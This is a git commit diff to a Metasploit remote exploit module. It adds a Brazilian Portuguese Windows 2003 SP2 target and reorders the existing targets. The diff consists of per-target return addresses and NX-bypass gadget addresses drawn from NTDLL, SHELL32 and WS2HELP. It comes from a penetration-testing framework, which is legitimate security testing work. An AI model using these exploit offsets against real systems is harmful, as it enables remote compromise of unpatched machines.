Add Portuguese target, lands #3961 (also reorders targets)

bug/bundler_fix
HD Moore 2014-12-12 14:23:02 -06:00
parent 183acb9582
commit 50b734f996
1 changed files with 93 additions and 79 deletions

View File

@ -88,6 +88,14 @@ class Metasploit3 < Msf::Exploit::Remote
} }
], # JMP ESI SVCHOST.EXE ], # JMP ESI SVCHOST.EXE
# Standard return-to-ESI without NX bypass
['Windows 2003 SP0 Universal',
{
'Ret' => 0x0100129e,
'Scratch' => 0x00020408,
}
], # JMP ESI SVCHOST.EXE
# #
# ENGLISH TARGETS # ENGLISH TARGETS
# #
@ -128,79 +136,6 @@ class Metasploit3 < Msf::Exploit::Remote
} }
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Standard return-to-ESI without NX bypass
['Windows 2003 SP0 Universal',
{
'Ret' => 0x0100129e,
'Scratch' => 0x00020408,
}
], # JMP ESI SVCHOST.EXE
# Standard return-to-ESI without NX bypass
['Windows 2003 SP1 English (NO NX)',
{
'Ret' => 0x71bf21a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1
['Windows 2003 SP1 English (NX)',
{
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP1 Japanese (NO NX)',
{
'Ret' => 0x71a921a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 English (NO NX)',
{
'Ret' => 0x71bf3969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 English (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 German (NO NX)',
{
'Ret' => 0x71a03969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 German (NX)',
{
'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# #
# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
# #
@ -637,12 +572,34 @@ class Metasploit3 < Msf::Exploit::Remote
} }
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Windows 2003 Targets
#
# Standard return-to-ESI without NX bypass # Standard return-to-ESI without NX bypass
# Provided by Masashi Fujiwara ['Windows 2003 SP1 English (NO NX)',
['Windows 2003 SP2 Japanese (NO NX)',
{ {
'Ret' => 0x71a91ed2, 'Ret' => 0x71bf21a2,
'Scratch' => 0x00020408 'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1
['Windows 2003 SP1 English (NX)',
{
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP1 Japanese (NO NX)',
{
'Ret' => 0x71a921a2,
'Scratch' => 0x00020408,
} }
], # JMP ESI WS2HELP.DLL ], # JMP ESI WS2HELP.DLL
@ -665,6 +622,54 @@ class Metasploit3 < Msf::Exploit::Remote
} }
], ],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 English (NO NX)',
{
'Ret' => 0x71bf3969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 English (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 German (NO NX)',
{
'Ret' => 0x71a03969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 German (NX)',
{
'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)
[ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
{
'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL OK
'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL OK
'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL OK
'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass # Standard return-to-ESI without NX bypass
['Windows 2003 SP2 Spanish (NO NX)', ['Windows 2003 SP2 Spanish (NO NX)',
{ {
@ -682,7 +687,16 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408, 'Scratch' => 0x00020408,
} }
] ],
# Standard return-to-ESI without NX bypass
# Provided by Masashi Fujiwara
['Windows 2003 SP2 Japanese (NO NX)',
{
'Ret' => 0x71a91ed2,
'Scratch' => 0x00020408
}
], # JMP ESI WS2HELP.DLL
# #
# Missing Targets # Missing Targets
@ -826,7 +840,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Windows 2003 SP0 is mostly universal # Windows 2003 SP0 is mostly universal
if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack' if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack'
mytarget = targets[7] mytarget = targets[3]
end end
# Windows 2003 R2 is treated the same as 2003 # Windows 2003 R2 is treated the same as 2003